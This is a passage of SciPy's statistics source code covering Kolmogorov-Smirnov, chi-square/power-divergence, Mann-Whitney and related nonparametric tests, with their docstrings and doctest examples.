If a string, it should be the name of a distribution in `scipy.stats`.
If an array, it should be a 1-D array of observations of random
variables.
If a callable, it should be a function to generate random variables;
it is required to have a keyword argument `size`.
cdf : str or callable
If a string, it should be the name of a distribution in `scipy.stats`.
If `rvs` is a string then `cdf` can be False or the same as `rvs`.
If a callable, that callable is used to calculate the cdf.
args : tuple, sequence, optional
Distribution parameters, used if `rvs` or `cdf` are strings.
N : int, optional
Sample size if `rvs` is string or callable. Default is 20.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided, see explanation in Notes
* 'greater': one-sided, see explanation in Notes
mode : {'approx', 'asymp'}, optional
Defines the distribution used for calculating the p-value.
The following options are available (default is 'approx'):
* 'approx': use approximation to exact distribution of test statistic
* 'asymp': use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D-.
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
ks_2samp
Notes
-----
In the one-sided test, the alternative is that the empirical
cumulative distribution function of the random variable is "less"
or "greater" than the cumulative distribution function G(x) of the
hypothesis, ``F(x)<=G(x)``, resp. ``F(x)>=G(x)``.
Examples
--------
>>> from scipy import stats
>>> x = np.linspace(-15, 15, 9)
>>> stats.kstest(x, 'norm')
(0.44435602715924361, 0.038850142705171065)
>>> np.random.seed(987654321) # set random seed to get the same result
>>> stats.kstest('norm', False, N=100)
(0.058352892479417884, 0.88531190944151261)
The above lines are equivalent to:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.norm.rvs(size=100), 'norm')
(0.058352892479417884, 0.88531190944151261)
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that ``cdf_dgp(x) < norm.cdf(x)``:
>>> np.random.seed(987654321)
>>> x = stats.norm.rvs(loc=0.2, size=100)
>>> stats.kstest(x,'norm', alternative = 'less')
(0.12464329735846891, 0.040989164077641749)
Reject equal distribution against alternative hypothesis: less
>>> stats.kstest(x,'norm', alternative = 'greater')
(0.0072115233216311081, 0.98531158590396395)
Don't reject equal distribution against alternative hypothesis: greater
>>> stats.kstest(x,'norm', mode='asymp')
(0.12464329735846891, 0.08944488871182088)
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.t.rvs(100,size=100),'norm')
(0.072018929165471257, 0.67630062862479168)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.t.rvs(3,size=100),'norm')
(0.131016895759829, 0.058826222555312224)
"""
if isinstance(rvs, string_types):
if (not cdf) or (cdf == rvs):
cdf = getattr(distributions, rvs).cdf
rvs = getattr(distributions, rvs).rvs
else:
raise AttributeError("if rvs is string, cdf has to be the "
"same distribution")
if isinstance(cdf, string_types):
cdf = getattr(distributions, cdf).cdf
if callable(rvs):
kwds = {'size': N}
vals = np.sort(rvs(*args, **kwds))
else:
vals = np.sort(rvs)
N = len(vals)
cdfvals = cdf(vals, *args)
# to not break compatibility with existing code
if alternative == 'two_sided':
alternative = 'two-sided'
if alternative in ['two-sided', 'greater']:
Dplus = (np.arange(1.0, N + 1)/N - cdfvals).max()
if alternative == 'greater':
return KstestResult(Dplus, distributions.ksone.sf(Dplus, N))
if alternative in ['two-sided', 'less']:
Dmin = (cdfvals - np.arange(0.0, N)/N).max()
if alternative == 'less':
return KstestResult(Dmin, distributions.ksone.sf(Dmin, N))
if alternative == 'two-sided':
D = np.max([Dplus, Dmin])
if mode == 'asymp':
return KstestResult(D, distributions.kstwobign.sf(D * np.sqrt(N)))
if mode == 'approx':
pval_two = distributions.kstwobign.sf(D * np.sqrt(N))
if N > 2666 or pval_two > 0.80 - N*0.3/1000:
return KstestResult(D, pval_two)
else:
return KstestResult(D, 2 * distributions.ksone.sf(D, N))
# Map from names to lambda_ values used in power_divergence().
_power_div_lambda_names = {
"pearson": 1,
"log-likelihood": 0,
"freeman-tukey": -0.5,
"mod-log-likelihood": -1,
"neyman": -2,
"cressie-read": 2/3,
}
def _count(a, axis=None):
"""
Count the number of non-masked elements of an array.
This function behaves like np.ma.count(), but is much faster
for ndarrays.
"""
if hasattr(a, 'count'):
num = a.count(axis=axis)
if isinstance(num, np.ndarray) and num.ndim == 0:
# In some cases, the `count` method returns a scalar array (e.g.
# np.array(3)), but we want a plain integer.
num = int(num)
else:
if axis is None:
num = a.size
else:
num = a.shape[axis]
return num
Power_divergenceResult = namedtuple('Power_divergenceResult',
('statistic', 'pvalue'))
def power_divergence(f_obs, f_exp=None, ddof=0, axis=0, lambda_=None):
"""
Cressie-Read power divergence statistic and goodness of fit test.
This function tests the null hypothesis that the categorical data
has the given frequencies, using the Cressie-Read power divergence
statistic.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
lambda_ : float or str, optional
The power in the Cressie-Read power divergence statistic. The default
is 1. For convenience, `lambda_` may be assigned one of the following
strings, in which case the corresponding numerical value is used::
String Value Description
"pearson" 1 Pearson's chi-squared statistic.
In this case, the function is
equivalent to `stats.chisquare`.
"log-likelihood" 0 Log-likelihood ratio. Also known as
the G-test [3]_.
"freeman-tukey" -1/2 Freeman-Tukey statistic.
"mod-log-likelihood" -1 Modified log-likelihood ratio.
"neyman" -2 Neyman's statistic.
"cressie-read" 2/3 The power recommended in [5]_.
Returns
-------
statistic : float or ndarray
The Cressie-Read power divergence test statistic. The value is
a float if `axis` is None or if` `f_obs` and `f_exp` are 1-D.
pvalue : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `stat` are scalars.
See Also
--------
chisquare
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
When `lambda_` is less than zero, the formula for the statistic involves
dividing by `f_obs`, so a warning or error may be generated if any value
in `f_obs` is 0.
Similarly, a warning or error may be generated if any value in `f_exp` is
zero when `lambda_` >= 0.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not a chisquare, in which case this
test is not appropriate.
This function handles masked arrays. If an element of `f_obs` or `f_exp`
is masked, then data at that position is ignored, and does not count
towards the size of the data set.
.. versionadded:: 0.13.0
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171015035606/http://faculty.vassar.edu/lowry/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
.. [3] "G-test", https://en.wikipedia.org/wiki/G-test
.. [4] Sokal, R. R. and Rohlf, F. J. "Biometry: the principles and
practice of statistics in biological research", New York: Freeman
(1981)
.. [5] Cressie, N. and Read, T. R. C., "Multinomial Goodness-of-Fit
Tests", J. Royal Stat. Soc. Series B, Vol. 46, No. 3 (1984),
pp. 440-464.
Examples
--------
(See `chisquare` for more examples.)
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies. Here we
perform a G-test (i.e. use the log-likelihood ratio statistic):
>>> from scipy.stats import power_divergence
>>> power_divergence([16, 18, 16, 14, 12, 12], lambda_='log-likelihood')
(2.006573162632538, 0.84823476779463769)
The expected frequencies can be given with the `f_exp` argument:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[16, 16, 16, 16, 16, 8],
... lambda_='log-likelihood')
(3.3281031458963746, 0.6495419288047497)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> power_divergence(obs, lambda_="log-likelihood")
(array([ 2.00657316, 6.77634498]), array([ 0.84823477, 0.23781225]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> power_divergence(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> power_divergence(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
test statistic with `ddof`.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we must use ``axis=1``:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8],
... [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
# Convert the input argument `lambda_` to a numerical value.
if isinstance(lambda_, string_types):
if lambda_ not in _power_div_lambda_names:
names = repr(list(_power_div_lambda_names.keys()))[1:-1]
raise ValueError("invalid string for lambda_: {0!r}. Valid strings "
"are {1}".format(lambda_, names))
lambda_ = _power_div_lambda_names[lambda_]
elif lambda_ is None:
lambda_ = 1
f_obs = np.asanyarray(f_obs)
if f_exp is not None:
f_exp = np.asanyarray(f_exp)
else:
# Ignore 'invalid' errors so the edge case of a data set with length 0
# is handled without spurious warnings.
with np.errstate(invalid='ignore'):
f_exp = f_obs.mean(axis=axis, keepdims=True)
# `terms` is the array of terms that are summed along `axis` to create
# the test statistic. We use some specialized code for a few special
# cases of lambda_.
if lambda_ == 1:
# Pearson's chi-squared statistic
terms = (f_obs - f_exp)**2 / f_exp
elif lambda_ == 0:
# Log-likelihood ratio (i.e. G-test)
terms = 2.0 * special.xlogy(f_obs, f_obs / f_exp)
elif lambda_ == -1:
# Modified log-likelihood ratio
terms = 2.0 * special.xlogy(f_exp, f_exp / f_obs)
else:
# General Cressie-Read power divergence.
terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
terms /= 0.5 * lambda_ * (lambda_ + 1)
stat = terms.sum(axis=axis)
num_obs = _count(terms, axis=axis)
ddof = asarray(ddof)
p = distributions.chi2.sf(stat, num_obs - 1 - ddof)
return Power_divergenceResult(stat, p)
def chisquare(f_obs, f_exp=None, ddof=0, axis=0):
"""
Calculate a one-way chi-square test.
The chi-square test tests the null hypothesis that the categorical data
has the given frequencies.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
Returns
-------
chisq : float or ndarray
The chi-squared test statistic. The value is a float if `axis` is
None or `f_obs` and `f_exp` are 1-D.
p : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `chisq` are scalars.
See Also
--------
scipy.stats.power_divergence
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not chi-square, in which case this test
is not appropriate.
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171022032306/http://vassarstats.net:80/textbook/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
Examples
--------
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies.
>>> from scipy.stats import chisquare
>>> chisquare([16, 18, 16, 14, 12, 12])
(2.0, 0.84914503608460956)
With `f_exp` the expected frequencies can be given.
>>> chisquare([16, 18, 16, 14, 12, 12], f_exp=[16, 16, 16, 16, 16, 8])
(3.5, 0.62338762774958223)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> chisquare(obs)
(array([ 2. , 6.66666667]), array([ 0.84914504, 0.24663415]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> chisquare(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> chisquare(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
chi-squared statistic with `ddof`.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we use ``axis=1``:
>>> chisquare([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8], [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
return power_divergence(f_obs, f_exp=f_exp, ddof=ddof, axis=axis,
lambda_="pearson")
Ks_2sampResult = namedtuple('Ks_2sampResult', ('statistic', 'pvalue'))
def _compute_prob_inside_method(m, n, g, h):
"""
Count the proportion of paths that stay strictly inside two diagonal lines.
Parameters
----------
m : integer
m > 0
n : integer
n > 0
g : integer
g is greatest common divisor of m and n
h : integer
0 <= h <= lcm(m,n)
Returns
-------
p : float
The proportion of paths that stay inside the two lines.
Count the integer lattice paths from (0, 0) to (m, n) which satisfy
|x/m - y/n| < h / lcm(m, n).
The paths make steps of size +1 in either positive x or positive y directions.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk.
Hodges, J.L. Jr.,
"The Significance Probability of the Smirnov Two-Sample Test,"
Arkiv fiur Matematik, 3, No. 43 (1958), 469-86.
"""
# Probability is symmetrical in m, n. Computation below uses m >= n.
if m < n:
m, n = n, m
mg = m // g
ng = n // g
# Count the integer lattice paths from (0, 0) to (m, n) which satisfy
# |nx/g - my/g| < h.
# Compute matrix A such that:
# A(x, 0) = A(0, y) = 1
# A(x, y) = A(x, y-1) + A(x-1, y), for x,y>=1, except that
# A(x, y) = 0 if |x/m - y/n|>= h
# Probability is A(m, n)/binom(m+n, n)
# Optimizations exist for m==n, m==n*p.
# Only need to preserve a single column of A, and only a sliding window of it.
# minj keeps track of the slide.
minj, maxj = 0, min(int(np.ceil(h / mg)), n + 1)
curlen = maxj - minj
# Make a vector long enough to hold maximum window needed.
lenA = min(2 * maxj + 2, n + 1)
# This is an integer calculation, but the entries are essentially
# binomial coefficients, hence grow quickly.
# Scaling after each column is computed avoids dividing by a
# large binomial coefficent at the end. Instead it is incorporated
# one factor at a time during the computation.
dtype = np.float64
A = np.zeros(lenA, dtype=dtype)
# Initialize the first column
A[minj:maxj] = 1
for i in range(1, m + 1):
# Generate the next column.
# First calculate the sliding window
lastminj, lastmaxj, lastlen = minj, maxj, curlen
minj = max(int(np.floor((ng * i - h) / mg)) + 1, 0)
minj = min(minj, n)
maxj = min(int(np.ceil((ng * i + h) / mg)), n + 1)
if maxj <= minj:
return 0
# Now fill in the values
A[0:maxj - minj] = np.cumsum(A[minj - lastminj:maxj - lastminj])
curlen = maxj - minj
if lastlen > curlen:
# Set some carried-over elements to 0
A[maxj - minj:maxj - minj + (lastlen - curlen)] = 0
# Peel off one term from each of top and bottom of the binomial coefficient.
scaling_factor = i * 1.0 / (n + i)
A *= scaling_factor
return A[maxj - minj - 1]
def _compute_prob_outside_square(n, h):
"""
Compute the proportion of paths that pass outside the two diagonal lines.
Parameters
----------
n : integer
n > 0
h : integer
0 <= h <= n
Returns
-------
p : float
The proportion of paths that pass outside the lines x-y = +/-h.
"""
# Compute Pr(D_{n,n} >= h/n)
# Prob = 2 * ( binom(2n, n-h) - binom(2n, n-2a) + binom(2n, n-3a) - ... ) / binom(2n, n)
# This formulation exhibits subtractive cancellation.
# Instead divide each term by binom(2n, n), then factor common terms
# and use a Horner-like algorithm
# P = 2 * A0 * (1 - A1*(1 - A2*(1 - A3*(1 - A4*(...)))))
P = 0.0
k = int(np.floor(n / h))
while k >= 0:
p1 = 1.0
# Each of the Ai terms has numerator and denominator with h simple terms.
for j in range(h):
p1 = (n - k * h - j) * p1 / (n + k * h + j + 1)
P = p1 * (1.0 - P)
k -= 1
return 2 * P
def _count_paths_outside_method(m, n, g, h):
"""
Count the number of paths that pass outside the specified diagonal.
Parameters
----------
m : integer
m > 0
n : integer
n > 0
g : integer
g is greatest common divisor of m and n
h : integer
0 <= h <= lcm(m,n)
Returns
-------
p : float
The number of paths that go low.
The calculation may overflow - check for a finite answer.
Exceptions
----------
FloatingPointError: Raised if the intermediate computation goes outside
the range of a float.
Notes
-----
Count the integer lattice paths from (0, 0) to (m, n), which at some
point (x, y) along the path, satisfy:
m*y <= n*x - h*g
The paths make steps of size +1 in either positive x or positive y directions.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk.
Hodges, J.L. Jr.,
"The Significance Probability of the Smirnov Two-Sample Test,"
Arkiv fiur Matematik, 3, No. 43 (1958), 469-86.
"""
# Compute #paths which stay lower than x/m-y/n = h/lcm(m,n)
# B(x, y) = #{paths from (0,0) to (x,y) without previously crossing the boundary}
# = binom(x, y) - #{paths which already reached the boundary}
# Multiply by the number of path extensions going from (x, y) to (m, n)
# Sum.
# Probability is symmetrical in m, n. Computation below assumes m >= n.
if m < n:
m, n = n, m
mg = m // g
ng = n // g
# 0 <= x_j <= m is the smallest integer for which n*x_j - m*j < g*h
xj = [int(np.ceil((h + mg * j)/ng)) for j in range(n+1)]
xj = [_ for _ in xj if _ <= m]
lxj = len(xj)
# B is an array just holding a few values of B(x,y), the ones needed.
# B[j] == B(x_j, j)
if lxj == 0:
return np.round(special.binom(m + n, n))
B = np.zeros(lxj)
B[0] = 1
# Compute the B(x, y) terms
# The binomial coefficient is an integer, but special.binom() may return a float.
# Round it to the nearest integer.
for j in range(1, lxj):
Bj = np.round(special.binom(xj[j] + j, j))
if not np.isfinite(Bj):
raise FloatingPointError()
for i in range(j):
bin = np.round(special.binom(xj[j] - xj[i] + j - i, j-i))
dec = bin * B[i]
Bj -= dec
B[j] = Bj
if not np.isfinite(Bj):
raise FloatingPointError()
# Compute the number of path extensions...
num_paths = 0
for j in range(lxj):
bin = np.round(special.binom((m-xj[j]) + (n - j), n-j))
term = B[j] * bin
if not np.isfinite(term):
raise FloatingPointError()
num_paths += term
return np.round(num_paths)
def ks_2samp(data1, data2, alternative='two-sided', mode='auto'):
"""
Compute the Kolmogorov-Smirnov statistic on 2 samples.
This is a two-sided test for the null hypothesis that 2 independent samples
are drawn from the same continuous distribution. The alternative hypothesis
can be either 'two-sided' (default), 'less' or 'greater'.
Parameters
----------
data1, data2 : sequence of 1-D ndarrays
Two arrays of sample observations assumed to be drawn from a continuous
distribution, sample sizes can be different.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided, see explanation in Notes
* 'greater': one-sided, see explanation in Notes
mode : {'auto', 'exact', 'asymp'}, optional
Defines the method used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : use 'exact' for small size arrays, 'asymp' for large
* 'exact' : use approximation to exact distribution of test statistic
* 'asymp' : use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS statistic.
pvalue : float
Two-tailed p-value.
See Also
--------
kstest
Notes
-----
This tests whether 2 samples are drawn from the same distribution. Note
that, like in the case of the one-sample KS test, the distribution is
assumed to be continuous.
In the one-sided test, the alternative is that the empirical
cumulative distribution function F(x) of the data1 variable is "less"
or "greater" than the empirical cumulative distribution function G(x)
of the data2 variable, ``F(x)<=G(x)``, resp. ``F(x)>=G(x)``.
If the KS statistic is small or the p-value is high, then we cannot
reject the hypothesis that the distributions of the two samples
are the same.
If the mode is 'auto', the computation is exact if the sample sizes are
less than 10000. For larger sizes, the computation uses the
Kolmogorov-Smirnov distributions to compute an approximate value.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk [1]_.
References
----------
.. [1] Hodges, J.L. Jr., "The Significance Probability of the Smirnov
Two-Sample Test," Arkiv fiur Matematik, 3, No. 43 (1958), 469-86.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678) #fix random seed to get the same result
>>> n1 = 200 # size of first sample
>>> n2 = 300 # size of second sample
For a different distribution, we can reject the null hypothesis since the
pvalue is below 1%:
>>> rvs1 = stats.norm.rvs(size=n1, loc=0., scale=1)
>>> rvs2 = stats.norm.rvs(size=n2, loc=0.5, scale=1.5)
>>> stats.ks_2samp(rvs1, rvs2)
(0.20833333333333334, 5.129279597781977e-05)
For a slightly different distribution, we cannot reject the null hypothesis
at a 10% or lower alpha since the p-value at 0.144 is higher than 10%
>>> rvs3 = stats.norm.rvs(size=n2, loc=0.01, scale=1.0)
>>> stats.ks_2samp(rvs1, rvs3)
(0.10333333333333333, 0.14691437867433876)
For an identical distribution, we cannot reject the null hypothesis since
the p-value is high, 41%:
>>> rvs4 = stats.norm.rvs(size=n2, loc=0.0, scale=1.0)
>>> stats.ks_2samp(rvs1, rvs4)
(0.07999999999999996, 0.41126949729859719)
"""
LARGE_N = 10000 # 'auto' will attempt to be exact if n1,n2 <= LARGE_N
data1 = np.sort(data1)
data2 = np.sort(data2)
n1 = data1.shape[0]
n2 = data2.shape[0]
if min(n1, n2) == 0:
raise ValueError('Data passed to ks_2samp must not be empty')
data_all = np.concatenate([data1, data2])
# using searchsorted solves equal data problem
cdf1 = np.searchsorted(data1, data_all, side='right') / n1
cdf2 = np.searchsorted(data2, data_all, side='right') / n2
cddiffs = cdf1 - cdf2
minS = -np.min(cddiffs)
maxS = np.max(cddiffs)
alt2Dvalue = {'less': minS, 'greater': maxS, 'two-sided': max(minS, maxS)}
d = alt2Dvalue[alternative]
g = gcd(n1, n2)
n1g = n1 // g
n2g = n2 // g
prob = -np.inf
original_mode = mode
if mode == 'auto':
if max(n1, n2) <= LARGE_N:
mode = 'exact'
else:
mode = 'asymp'
elif mode == 'exact':
# If lcm(n1, n2) is too big, switch from exact to asymp
if n1g >= np.iinfo(np.int).max / n2g:
mode = 'asymp'
warnings.warn(
"Exact ks_2samp calculation not possible with samples sizes "
"%d and %d. Switching to 'asymp' " % (n1, n2), RuntimeWarning)
saw_fp_error = False
if mode == 'exact':
lcm = (n1 // g) * n2
h = int(np.round(d * lcm))
d = h * 1.0 / lcm
if h == 0:
prob = 1.0
else:
try:
if alternative == 'two-sided':
if n1 == n2:
prob = _compute_prob_outside_square(n1, h)
else:
prob = 1 - _compute_prob_inside_method(n1, n2, g, h)
else:
if n1 == n2:
# prob = binom(2n, n-h) / binom(2n, n)
# Evaluating in that form incurs roundoff errors
# from special.binom. Instead calculate directly
prob = 1.0
for j in range(h):
prob = (n1 - j) * prob / (n1 + j + 1)
else:
num_paths = _count_paths_outside_method(n1, n2, g, h)
bin = special.binom(n1 + n2, n1)
if not np.isfinite(bin) or not np.isfinite(num_paths) or num_paths > bin:
raise FloatingPointError()
prob = num_paths / bin
except FloatingPointError:
# Switch mode
mode = 'asymp'
saw_fp_error = True
# Can't raise warning here, inside the try
finally:
if saw_fp_error:
if original_mode == 'exact':
warnings.warn(
"ks_2samp: Exact calculation overflowed. "
"Switching to mode=%s" % mode, RuntimeWarning)
else:
if prob > 1 or prob < 0:
mode = 'asymp'
if original_mode == 'exact':
warnings.warn(
"ks_2samp: Exact calculation incurred large"
" rounding error. Switching to mode=%s" % mode,
RuntimeWarning)
if mode == 'asymp':
# The product n1*n2 is large. Use Smirnov's asymptoptic formula.
if alternative == 'two-sided':
en = np.sqrt(n1 * n2 / (n1 + n2))
# Switch to using kstwo.sf() when it becomes available.
# prob = distributions.kstwo.sf(d, int(np.round(en)))
prob = distributions.kstwobign.sf(en * d)
else:
m, n = max(n1, n2), min(n1, n2)
z = np.sqrt(m*n/(m+n)) * d
# Use Hodges' suggested approximation Eqn 5.3
expt = -2 * z**2 - 2 * z * (m + 2*n)/np.sqrt(m*n*(m+n))/3.0
prob = np.exp(expt)
prob = (0 if prob < 0 else (1 if prob > 1 else prob))
return Ks_2sampResult(d, prob)
def tiecorrect(rankvals):
"""
Tie correction factor for Mann-Whitney U and Kruskal-Wallis H tests.
Parameters
----------
rankvals : array_like
A 1-D sequence of ranks. Typically this will be the array
returned by `~scipy.stats.rankdata`.
Returns
-------
factor : float
Correction factor for U or H.
See Also
--------
rankdata : Assign ranks to the data
mannwhitneyu : Mann-Whitney rank test
kruskal : Kruskal-Wallis H test
References
----------
.. [1] Siegel, S. (1956) Nonparametric Statistics for the Behavioral
Sciences. New York: McGraw-Hill.
Examples
--------
>>> from scipy.stats import tiecorrect, rankdata
>>> tiecorrect([1, 2.5, 2.5, 4])
0.9
>>> ranks = rankdata([1, 3, 2, 4, 5, 7, 2, 8, 4])
>>> ranks
array([ 1. , 4. , 2.5, 5.5, 7. , 8. , 2.5, 9. , 5.5])
>>> tiecorrect(ranks)
0.9833333333333333
"""
arr = np.sort(rankvals)
idx = np.nonzero(np.r_[True, arr[1:] != arr[:-1], True])[0]
cnt = np.diff(idx).astype(np.float64)
size = np.float64(arr.size)
return 1.0 if size < 2 else 1.0 - (cnt**3 - cnt).sum() / (size**3 - size)
MannwhitneyuResult = namedtuple('MannwhitneyuResult', ('statistic', 'pvalue'))
def mannwhitneyu(x, y, use_continuity=True, alternative=None):
"""
Compute the Mann-Whitney rank test on samples x and y.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
use_continuity : bool, optional
Whether a continuity correction (1/2.) should be taken into
account. Default is True.
alternative : {None, 'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is None):
* None: computes p-value half the size of the 'two-sided' p-value and
a different U statistic. The default behavior is not the same as
using 'less' or 'greater'; it only exists for backward compatibility
and is deprecated.
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
Use of the None option is deprecated.
Returns
-------
statistic : float
The Mann-Whitney U statistic, equal to min(U for x, U for y) if
`alternative` is equal to None (deprecated; exists for backward
compatibility), and U for y otherwise.
pvalue : float
p-value assuming an asymptotic normal distribution. One-sided or
two-sided, depending on the choice of `alternative`.
Notes
-----
Use only when the number of observation in each sample is > 20 and
you have 2 independent samples of ranks. Mann-Whitney U is
significant if the u-obtained is LESS THAN or equal to the critical
value of U.
This test corrects for ties and by default uses a continuity correction.
References
----------
.. [1] https://en.wikipedia.org/wiki/Mann-Whitney_U_test
.. [2] H.B. Mann and D.R. Whitney, "On a Test of Whether one of Two Random
Variables is Stochastically Larger than the Other," The Annals of
Mathematical Statistics, vol. 18, no. 1, pp. 50-60, 1947.
"""
if alternative is None:
warnings.warn("Calling `mannwhitneyu` without specifying "
"`alternative` is deprecated.", DeprecationWarning)
x = np.asarray(x)
y = np.asarray(y)
n1 = len(x)
n2 = len(y)
ranked = rankdata(np.concatenate((x, y)))
rankx = ranked[0:n1] # get the x-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - np.sum(rankx, axis=0) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
T = tiecorrect(ranked)
if T == 0:
raise ValueError('All numbers are identical in mannwhitneyu')
sd = np.sqrt(T * n1 * n2 * (n1+n2+1) / 12.0)
meanrank = n1*n2/2.0 + 0.5 * use_continuity
if alternative is None or alternative == 'two-sided':
bigu = max(u1, u2)
elif alternative == 'less':
bigu = u1
elif alternative == 'greater':
bigu = u2
else:
raise ValueError("alternative should be None, 'less', 'greater' "
"or 'two-sided'")
z = (bigu - meanrank) / sd
if alternative is None:
# This behavior, equal to half the size of the two-sided
# p-value, is deprecated.
p = distributions.norm.sf(abs(z))
elif alternative == 'two-sided':
p = 2 * distributions.norm.sf(abs(z))
else:
p = distributions.norm.sf(z)
u = u2
# This behavior is deprecated.
if alternative is None:
u = min(u1, u2)
return MannwhitneyuResult(u, p)
RanksumsResult = namedtuple('RanksumsResult', ('statistic', 'pvalue'))
def ranksums(x, y):
"""
Compute the Wilcoxon rank-sum statistic for two samples.
The Wilcoxon rank-sum test tests the null hypothesis that two sets
of measurements are drawn from the same distribution. The alternative
hypothesis is that values in one sample are more likely to be
larger than the values in the other sample.
This test should be used to compare two samples from continuous
distributions. It does not handle ties between measurements
in x and y. For tie-handling and an optional continuity correction
see `scipy.stats.mannwhitneyu`.
Parameters
----------
x,y : array_like
The data from the two samples.
Returns
-------
statistic : float
The test statistic under the large-sample approximation that the
rank sum statistic is normally distributed.
pvalue : float
The two-sided p-value of the test.
References
----------
